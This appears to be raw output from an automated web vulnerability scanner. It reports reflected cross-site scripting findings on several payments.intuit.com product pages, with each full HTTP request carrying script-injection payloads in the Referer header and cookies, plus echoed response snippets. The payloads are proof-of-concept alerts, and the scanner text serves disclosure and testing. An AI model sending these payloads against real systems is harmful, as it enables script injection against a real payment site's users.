GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb1c'-alert(1)-'0a97bbe41af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d309'-alert(1)-'98a1572654c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 43536--><script>alert(1)</script>5f48ddc4902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902
The value of the Referer HTTP header is copied into an HTML comment. The payload eb605--><script>alert(1)</script>313dcde783a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 193fe'-alert(1)-'288dfdb8b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71edb'-alert(1)-'6b7e8734b5b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 9b18e--><script>alert(1)</script>e7e01249c3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7408f'-alert(1)-'85140b02fc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload ee311--><script>alert(1)</script>ebc26ad0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf
The value of the Referer HTTP header is copied into an HTML comment. The payload d4413--><script>alert(1)</script>903e8593f48 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c386'-alert(1)-'4f235ab0373 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373
